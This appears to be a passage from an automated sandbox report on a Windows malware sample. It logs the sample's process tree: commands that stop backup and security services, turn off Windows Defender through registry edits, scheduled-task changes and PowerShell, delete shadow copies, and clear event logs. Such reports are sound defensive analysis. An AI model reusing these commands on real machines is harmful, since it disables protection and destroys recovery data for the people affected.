memory of 624 1380 net.exe net1.exe PID 1600 wrote to memory of 1584 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1584 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1584 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1584 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1584 wrote to memory of 1624 1584 net.exe net1.exe PID 1584 wrote to memory of 1624 1584 net.exe net1.exe PID 1584 wrote to memory of 1624 1584 net.exe net1.exe PID 1584 wrote to memory of 1624 1584 net.exe net1.exe PID 1600 wrote to memory of 1124 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1124 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1124 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1124 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1124 wrote to memory of 992 1124 net.exe net1.exe PID 1124 wrote to memory of 992 1124 net.exe net1.exe PID 1124 wrote to memory of 992 1124 net.exe net1.exe PID 1124 wrote to memory of 992 1124 net.exe net1.exe PID 1600 wrote to memory of 1588 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1588 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1588 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1600 wrote to memory of 1588 1600 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe net.exe PID 1588 wrote to memory of 1448 1588 net.exe net1.exe PID 1588 wrote to memory of 1448 1588 net.exe net1.exe PID 1588 wrote to memory of 1448 1588 net.exe net1.exe PID 1588 wrote to memory of 1448 1588 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\SysWOW64\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:560
-
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1480
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:364
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1576
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:624
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1624
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:992
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1448
-
C:\Windows\SysWOW64\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1672
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1952
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:688
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:728
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1648
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:1752
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1664
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1660
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:596
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1860
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1824
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1136
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:304
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2028
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1624
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1400
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1872
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1212
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:544
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1968
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1944
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1504
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1152
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:268
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1724
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:696
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1000
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1868
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:988
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1708
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1960
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1988
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1700
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1580
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:856
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1044
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:836
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1360
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:932
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:336 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1696
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1480 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1788 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1796 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:892 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:624 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:920 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2060
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2084 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2096
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2116 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2172
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2192
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5b05da822fc672cfdb7dee30f2f87afd6
SHA12e0a89ebf40b8a0b593026d8eec01501e1588a29
SHA256fc37f4dc8be0b59d230abbde1141dbdc3d8f4de03796144d871435bdc14e54ce
SHA5128359f7eed082fba1dc1d57167dab12dfaa225cc30073e99a31bd9c0fb267a12b0590ab3cf26b3d140e7f6ad8d190151c265b4a17d406e4766dc3031116ccff79